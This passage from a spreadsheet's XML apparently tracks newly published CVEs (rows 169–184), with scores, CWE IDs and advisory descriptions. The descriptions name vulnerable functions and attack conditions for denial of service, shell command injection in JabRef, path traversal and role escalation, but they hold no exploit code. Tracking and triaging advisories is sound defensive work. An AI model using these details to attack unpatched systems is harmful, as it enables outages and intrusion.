      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25275</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50125</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>MKP is a Model Context Protocol server for Kubernetes. Prior to 0.4.1, cmd/server/main.go exposes the default HTTP endpoint and pkg/mcp/server.go registers the unauthenticated get_resource tool, which accepts attacker-controlled limitBytes and tailLines values for the pods logs subresource. buildPodLogOpts() in pkg/k8s/subresource.go parses those values as unbounded int64 parameters, and defaultGetPodLogs() copies the returned Kubernetes log stream through io.Copy into an in-memory bytes.Buffer without an application-side cap. A remote attacker who can reach the default port 8080 MCP endpoint and select a pod with sufficiently large accumulated logs can send one tools/call request that causes large allocations and additional response copies, while the request-frequency limiter does not constrain per-request volume. This can exhaust process memory, terminate the MKP server, and deny the MCP service; observed testing showed more than one GiB of RSS growth while handling a 128 MiB requested stream. This issue is fixed in version 0.4.1.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50125</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50275</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The Datadog PHP Tracer provides application performance monitoring and distributed tracing for PHP. Prior to 1.19.2, ddtrace_deserialize_baggage in ext/distributed_tracing_headers.c parses incoming W3C baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES. A remote unauthenticated client can send an arbitrarily large number of comma-separated key-value pairs or a single oversized value, causing the tracer to allocate hash-map entries and consume unbounded CPU and memory on each request. Baggage extraction is enabled by default in most affected deployments unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT. This issue is fixed in version 1.19.2.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50275</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50277</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>dd-trace-cpp is the Datadog distributed tracing library for C++. Prior to 2.1.0, dd-trace-cpp parses incoming W3C baggage headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES on the extraction path, even though those limits are enforced during injection. A remote unauthenticated attacker can send a header containing many comma-separated key-value pairs or one very large value, causing per-request hash-map allocation and unbounded CPU and memory consumption. Baggage extraction is enabled by default in most affected tracers unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT, so affected internet-facing services can be denied service. This issue is fixed in version 2.1.0.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50277</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50285</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-770</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Pomerium is an identity and context-aware access proxy. Prior to 0.32.8, decodeQueryStringV2 in pkg/hpke/url.go performs zstd decompression of attacker-controlled data without an output-memory limit when DecryptURLValues processes HPKE V2 values for Stateless.Callback in internal/authenticateflow/stateless.go. In hosted or stateless authentication deployments, an unauthenticated attacker can obtain the receiver key from /.well-known/pomerium/hpke-public-key, provide a matching attacker-controlled sender key, and send a compressed payload to /.pomerium/callback that expands before validateSenderPublicKey rejects the sender. This can allocate hundreds of megabytes per request, exhaust proxy memory, crash or degrade the process, and block access to applications protected by the deployment. Stateful deployments are not affected because the stateful callback verifies its HMAC signature before decryption and decompression. This issue is fixed in version 0.32.8.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50285</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53534</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>JabRef is a desktop application for managing BibTeX and BibLaTeX libraries. Prior to 6.0-alpha.6, when jabsrv or JabRef's built-in HTTP server is enabled, the GET /better-bibtex/cayw endpoint accepts an external command query parameter and CAYWQueryParams.getCommand() passes it through CAYWResource.getCitation() into PushToSublimeText.getCommandLine(). On Unix-like systems, PushToSublimeText combines this untrusted cite-command prefix and citation keys into a string executed through sh -c by ProcessBuilder without shell escaping. A client that can cause a localhost request with application=sublime can inject shell metacharacters and execute operating-system commands as the JabRef user when a valid Sublime Text command path is configured and the victim completes the CAYW selection dialog. The built-in server is disabled by default, so exploitation requires the victim to enable it or run jabsrv. This issue is fixed in version 6.0-alpha.6.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53534</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54716</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Valhalla is an open source routing engine and accompanying libraries for use with OpenStreetMap data. In 3.7.0 and earlier, a POST request to /sources_to_targets containing an exclude_polygons ring formed by three collinear points can cause unbounded memory growth in the worker. The zero-area geometry, rather than the other request options, triggers processing in src/loki/polygon_search.cc until the process is terminated by the out-of-memory killer. A single unauthenticated request can therefore stop a public-facing worker. Other endpoints that accept exclude_polygons, including /route, were not verified as affected. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54716</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63460</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:vendure/core</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop GraphQL API allows an unauthenticated caller to supply a catastrophically backtracking pattern through StringOperators.regex. packages/core/src/service/helpers/list-query-builder/parse-filter-params.ts passes the raw pattern to the REGEXP implementation registered by packages/core/src/service/helpers/list-query-builder/list-query-builder.ts, and better-sqlite3 and sqljs evaluate it synchronously in the Node.js event loop. ShopProductsResolver.products is publicly reachable, so one nested-quantifier pattern can block request processing and make the storefront and admin API unavailable, while repeated requests can sustain denial of service. PostgreSQL and MySQL or MariaDB deployments do not execute this regular expression in the Node.js event loop. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63460</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68523</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr">
        <is>
          <t>0.19.0</t>
        </is>
      </c>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S177"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77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68523</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68537</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr">
        <is>
          <t>0.26.0</t>
        </is>
      </c>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S178"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version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78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68537</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81481</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81481</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81515</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Eureka</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, EurekaDiscoveryClient deserializes the registry response as one unit, and an unrecognized actionType or status, a non-Boolean isCoordinatingDiscoveryServer, or a nonnumeric timestamp can abort the entire response. A principal that can register or update an instance can cause all connected Steeltoe clients to receive an empty or stale instance list until the malformed registration is removed. The JsonInstanceInfoConverter, BoolStringJsonConverter, and LongStringJsonConverter parsing paths are affected. This issue is distinct from the earlier DataCenterInfo.name parsing vulnerability. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81515</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81516</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Consul</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, ConsulDiscoveryClient constructs ConsulServiceInstance objects by parsing each registration's secure metadata with a strict Boolean conversion. A principal that can register a Consul service can supply a secure value other than true or false, causing the exception from one instance to abort construction of the entire instance list and make the targeted service undiscoverable. When GetAllInstancesAsync enumerates all services, one malformed instance can abort enumeration across every service. The outage persists until the offending registration is removed. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81516</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85128</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Choose User Role at Registration WordPress plugin before 1.3.3 does not validate the role requested at registration against the roles an administrator chose to offer, allowing unauthenticated users to request any role, including administrator, and to be granted it once the request is approved. Exploitation requires the Choose User Role at Registration WordPress plugin before 1.3.3's role selection feature and public account registration to both be enabled.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85128</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85715</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:exifreader</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr">
        <is>
          <t>4.41.1</t>
        </is>
      </c>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-789, CWE-835</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>ExifReader is a JavaScript Exif information parser. Prior to 4.41.1, ExifReader parses attacker-controlled HEIC or AVIF ISO-BMFF files in getItems() within src/image-header-iso-bmff-iloc.js and trusts iloc itemCount and extentCount values while allocating an extent object for every nested-loop iteration. When offsetSize, lengthSize, baseOffsetSize, and indexSize are zero, the extent fields consume no input bytes and the buffer offset does not advance, but the parser can still allocate up to itemCount multiplied by extentCount objects without an allocation budget. A small malicious iloc box can therefore cause hundreds of megabytes of heap growth or exhaust system memory, terminating a Node.js process and denying service to web, desktop, or mobile applications that parse untrusted images. The zero field widths are valid ISO-BMFF values indicating absent fields, so the vulnerable parser must bound work rather than relying on offset advancement. The issue is fixed in version 4.41.1.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85715</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85719</t>
